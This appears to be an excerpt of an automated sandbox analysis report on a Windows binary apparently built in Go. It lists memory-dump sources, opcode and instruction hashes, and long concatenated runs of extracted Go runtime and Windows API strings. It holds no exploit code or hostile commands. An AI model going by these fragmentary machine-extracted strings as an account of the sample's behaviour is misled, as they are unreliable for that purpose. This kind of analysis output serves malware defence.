                      • but memory size because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125AddFontResourceExWArab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCheckMenuRadioItemCloseServiceHandleCommandLineToArgvWCreateCo, xrefs: 00692385
                      • runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prec34694469519536141888238489627838134765625MapIter.Next called on exhausted iteratorattempted to add zero-sized address rangebinary: varint overflows a 64-bit integercan't call point, xrefs: 006922D4, 00692345
                      • runtime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base173472347597680709441192448139190673828125867361737988403547205962240695953369140625MapIter.Value called on exhausted iteratoracquireSudo, xrefs: 006923C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: but memory size because dotdotdot in async preempt to non-Go memory , locked to thread298023223876953125AddFontResourceExWArab Standard TimeCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCheckMenuRadioItemCloseServiceHandleCommandLineToArgvWCreateCo$ of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHE$ with GC prog476837158203125<invalid Value>ASCII_Hex_DigitAddDllDirectoryCLSIDFromStringCallWindowProcWCreateHardLinkWCreatePopupMenuCreateWindowExWDeviceIoControlDialogBoxParamWDragAcceptFilesDrawThemeTextExDuplicateHandleExcludeClipRectFailed to find Faile$runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaFixed64 called with prec > 18syntax e$runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prec34694469519536141888238489627838134765625MapIter.Next called on exhausted iteratorattempted to add zero-sized address rangebinary: varint overflows a 64-bit integercan't call point$runtime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt base173472347597680709441192448139190673828125867361737988403547205962240695953369140625MapIter.Value called on exhausted iteratoracquireSudo
                      • API String ID: 0-1719771541
                      • Opcode ID: e4db7936c34dcd0285bafd420f67ceee2c0b2a9f7be11a497ad167ddf5c763c9
                      • Instruction ID: b478ceebfd98f5f673d2f68545f23936754f0319dcc4e25f1f840380166fbd88
                      • Opcode Fuzzy Hash: e4db7936c34dcd0285bafd420f67ceee2c0b2a9f7be11a497ad167ddf5c763c9
                      • Instruction Fuzzy Hash: 79517C76618B4186DB50EF51F48039EBB6AF789B80F84512AEB8D03B66CF38C595CB14
                      Strings
                      • s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)work.nwait > work.nproc116415321826934814453125582076, xrefs: 0068B96F
                      • s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left outstanding across sweep generationsattempt to execute system stack code on user stackcompileCallback: function argument frame too largemallocgc call, xrefs: 0068B9EF
                      • freeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledprotocol not avail, xrefs: 0068B985
                      • s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunsafe.PointerwglCopyContextwglMakeCurrentwinapi error #work.full != 0 with GC prog476837158203125<inval, xrefs: 0068B925
                      • runtime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)work.nwait > work.nproc1164153, xrefs: 0068B9A5
                      • s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDestroyIconDestroyMenuDives_AkuruDrawMenuBarDrawTextExWEnumWindowsExitProcessFindWindowWFreeLib, xrefs: 0068B945, 0068B9C5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDestroyIconDestroyMenuDives_AkuruDrawMenuBarDrawTextExWEnumWindowsExitProcessFindWindowWFreeLib$freeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledprotocol not avail$runtime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)work.nwait > work.nproc1164153$s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left outstanding across sweep generationsattempt to execute system stack code on user stackcompileCallback: function argument frame too largemallocgc call$s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)work.nwait > work.nproc116415321826934814453125582076$s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunknown methodunsafe.PointerwglCopyContextwglMakeCurrentwinapi error #work.full != 0 with GC prog476837158203125<inval
                      • API String ID: 0-945429370
                      • Opcode ID: faf8502b13a62ccb95edf83ad97efc287b6ad9177deea4c7ea3ee64c968694cf
                      • Instruction ID: 7c51d5dc0027a05e33b5fa1cf9f9eb0aeec2628c03ac4aadb71f17e3fd53b7d0
                      • Opcode Fuzzy Hash: faf8502b13a62ccb95edf83ad97efc287b6ad9177deea4c7ea3ee64c968694cf
                      • Instruction Fuzzy Hash: 0D516072619B80C6CB50AB15F4803AEBBA6F789B80F445516EB8D07B66DF3CC581CB54
                      Strings
                      • , p.searchAddr = 0123456789ABCDEFX0123456789abcdefx1192092895507812559604644775390625: missing method AdjustTokenGroupsAttachThreadInputCertFindExtensionChoosePixelFormatCryptDecodeObjectDeleteEnhMetaFileDnsRecordListFreeEndDeferWindowPosFLE Standard TimeGC as, xrefs: 006A7FA9
                      • bad summary databad symbol tablecastogscanstatuscontext canceledgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapnewmHandoff.lockno route to hostnon-, xrefs: 006A7FCF
                      • runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptionunexpected value stepwglCreateLayerContextwglDescribeLayerPlane/lib/time/zoneinfo.zip4656612873077392578125Aleuti, xrefs: 006A7F85
                      • , npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDestroyIconDestroyMenuDives_AkuruDrawMenuBarDrawTextExWEnumWindowsExitProcessFindWindowWFreeLibraryGOTRACEBACKGetAncestorGetCaretPosGetFileTypeGetIcon, xrefs: 006A7F45
                      • runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding pwglGetCurrentDC already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625AdjustWindowRectBringWindow, xrefs: 006A7F27
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: , npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDestroyIconDestroyMenuDives_AkuruDrawMenuBarDrawTextExWEnumWindowsExitProcessFindWindowWFreeLibraryGOTRACEBACKGetAncestorGetCaretPosGetFileTypeGetIcon$, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx1192092895507812559604644775390625: missing method AdjustTokenGroupsAttachThreadInputCertFindExtensionChoosePixelFormatCryptDecodeObjectDeleteEnhMetaFileDnsRecordListFreeEndDeferWindowPosFLE Standard TimeGC as$bad summary databad symbol tablecastogscanstatuscontext canceledgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapnewmHandoff.lockno route to hostnon-$runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding pwglGetCurrentDC already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625AdjustWindowRectBringWindow$runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptionunexpected value stepwglCreateLayerContextwglDescribeLayerPlane/lib/time/zoneinfo.zip4656612873077392578125Aleuti
                      • API String ID: 0-3438953204
                      • Opcode ID: eeab59b283d6fc09fc81f4c4a4c8a86845f57021a568254b57fd1a31d0d77410
                      • Instruction ID: dd18e558b5af8765219ae3c07b4fb72430f8529bde2b5222f7e6d78b4d2915bc
                      • Opcode Fuzzy Hash: eeab59b283d6fc09fc81f4c4a4c8a86845f57021a568254b57fd1a31d0d77410
                      • Instruction Fuzzy Hash: A451B372719F8486DB50AB15E84039DA766F78ABD0F54412AEF9C07B6ACF3CC981CB44
                      Strings
                      • cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamBamumBatakBuhidDograErrorGetDCGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arrayclosedeferfalsefaultgFreegcinggscanhchanhttpsimap2, xrefs: 0068A1A5
                      • -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINE, xrefs: 0068A1E5
                      • runtime: lfstack.push invalid packing: node=use of WriteTo with pre-connected connectioncannot send after transport endpoint shutdowncharacter string exceeds maximum length (255)exitsyscall: syscall frame is no longer validheapBitsSetType: called with non-poin, xrefs: 0068A187
                      • packed= pointer stack=[ status 48828125AbortDocAcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDeleteDCDuployanEndPaintEqualSidEthiopicExtenderGdiFlushGeorgianGetFocusGetPixelGoStringGujaratiGurmukhiHiraganaIsIconicIsWindowIsZoomedJava, xrefs: 0068A1C5
                      • lfstack.pushmadvdontneedmheapSpecialmspanSpecialnetapi32.dllno such hostnot pollableoleaut32.dllopengl32.dllraceFiniLockreleasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswinspool.drvwintrust.dllwirep: p, xrefs: 0068A20F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=(unknown), newval=, oldval=, size = , tail = 244140625: status=AuthorityBassa_VahBhaiksukiClassINE$ cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamBamumBatakBuhidDograErrorGetDCGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamilTypeA] = (arrayclosedeferfalsefaultgFreegcinggscanhchanhttpsimap2$ packed= pointer stack=[ status 48828125AbortDocAcceptExArmenianBalineseBopomofoBugineseCancelIoCherokeeClassANYCyrillicDeleteDCDuployanEndPaintEqualSidEthiopicExtenderGdiFlushGeorgianGetFocusGetPixelGoStringGujaratiGurmukhiHiraganaIsIconicIsWindowIsZoomedJava$lfstack.pushmadvdontneedmheapSpecialmspanSpecialnetapi32.dllno such hostnot pollableoleaut32.dllopengl32.dllraceFiniLockreleasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringswinspool.drvwintrust.dllwirep: p$runtime: lfstack.push invalid packing: node=use of WriteTo with pre-connected connectioncannot send after transport endpoint shutdowncharacter string exceeds maximum length (255)exitsyscall: syscall frame is no longer validheapBitsSetType: called with non-poin
                      • API String ID: 0-1135946982
                      • Opcode ID: 5c9c63aecd4a1eeaf96ef84013a2fd7437a53f8069967a592eb805eaee539f1c
                      • Instruction ID: 5b15c838fe144d3e10da930a271f53496c01c44b6cf1b0635815f1b8d9298b0c
                      • Opcode Fuzzy Hash: 5c9c63aecd4a1eeaf96ef84013a2fd7437a53f8069967a592eb805eaee539f1c
                      • Instruction Fuzzy Hash: AB318972219B81C6DB50AF11F84139EB769FB89B80F88952AEF8D03B26CF3CC1518754
                      Strings
                      • r10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use, xrefs: 00686C25
                      • r8 r9 rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, , xrefs: 00686BA5
                      • rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime, xrefs: 006869EB
                      • cs deadlockfs gs no anodepollDescr10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (fo, xrefs: 00686E25
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: cs deadlockfs gs no anodepollDescr10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (fo$r10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use$r8 r9 rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, $rax rbp rbx rcx rdi recvfromrflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBufunknown(wsaioctl (forced) -> node= B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked ms cpu, not in [ runtime
                      • API String ID: 0-1413982224
                      • Opcode ID: 9d645f8d185dffe5de37804407c51fba22b2570d8defdf87bd6df9001cb2c3bc
                      • Instruction ID: b4d9fb816e3c01c1a63b996d04c94938a28b20ef252b593b373d3068fadfbdca
                      • Opcode Fuzzy Hash: 9d645f8d185dffe5de37804407c51fba22b2570d8defdf87bd6df9001cb2c3bc
                      • Instruction Fuzzy Hash: 71C1CD76225B4086C690FF95F0813AEAB66FB89B41F415429FA8D07B27DF38C1C48769
                      Strings
                      • out of range procedure in to finalizer untyped args -thread limit1907348632812595367431640625ActivateActCtxCertCloseStoreClientToScreenCloseClipboardCloseThemeDataCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateSe, xrefs: 006CA6F6
                      • - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinfmaftpgc gp in intip4mapnilobjpc, xrefs: 006CA711
                      • runtime: textAddr streams pipe errorsystem page size (tracebackancestorsuse of closed filevalue out of rangewglUseFontBitmapsW [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeA, xrefs: 006CA6DB
                      • runtime: text offset out of rangeruntime: type offset out of rangeslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativetoo many Answers to pack (>65535)too many levels of symbolic l, xrefs: 006CA739
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinfmaftpgc gp in intip4mapnilobjpc$ out of range procedure in to finalizer untyped args -thread limit1907348632812595367431640625ActivateActCtxCertCloseStoreClientToScreenCloseClipboardCloseThemeDataCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMutexExWCreateProcessWCreateSe$runtime: text offset out of rangeruntime: type offset out of rangeslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-negativetoo many Answers to pack (>65535)too many levels of symbolic l$runtime: textAddr streams pipe errorsystem page size (tracebackancestorsuse of closed filevalue out of rangewglUseFontBitmapsW [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=14901161193847656257450580596923828125Altai Standard TimeA
                      • API String ID: 0-3032699057
                      • Opcode ID: cff16743a2d4e61cbedab35ed50bc546b1a7b3d88e0cdafab77f8143d26f7df9
                      • Instruction ID: fd00aa005222302a8eceac3e8a13e11873f4d16ce9a48ab09ccbb01a87e7214f
                      • Opcode Fuzzy Hash: cff16743a2d4e61cbedab35ed50bc546b1a7b3d88e0cdafab77f8143d26f7df9
